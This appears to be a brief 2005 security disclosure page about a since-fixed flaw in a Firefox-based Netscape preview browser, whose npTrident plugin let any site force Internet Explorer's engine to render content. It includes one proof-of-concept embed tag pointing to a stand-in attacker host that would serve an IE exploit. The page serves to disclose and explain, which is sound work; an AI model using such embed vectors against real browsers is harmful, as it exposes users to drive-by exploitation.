If you open this page in the new version of Netscape, the content in the box below should be rendered by IE.

In mozilla:


Vulnerability in Firefox-based Netscape Browser [fixed]

Update 18/01/05: I've been told that this vulnerabilty has been fixed in the latest preview release of the browser.

This page demonstrates a security vulnerability present in the new Firefox-based Netscape Browser. One of its main features is that it allows you to display pages either with the default Gecko rendering engine or with Internet Explorer's Trident engine. You can switch engines on the fly, or have Netscape remember settings for certain sites.

To allow Trident to be embedded in the browser, Netscape ships with a plugin called npTrident. Unfortuanately, this plugin can be embedded by any website. This means that the browser is potentially vulnerability to any holes present in the IE rendering engine, even if the user is browsing with Gecko. A site would simply have to insert the following code, pointing to a page containing an IE exploit:

<embed name="plugin" src="http://www.badsite.com" type="text/html" />

Of course, this new Netscape version is only a preview release, but I'm suprised none of the developers spotted this (unless it's a deliberate 'feature'). Browser security has been such a big issue over the last year, and embedding IE is like playing with fire. I'm not saying it's a bad idea per se, but it has to be done well, and as securely as possible.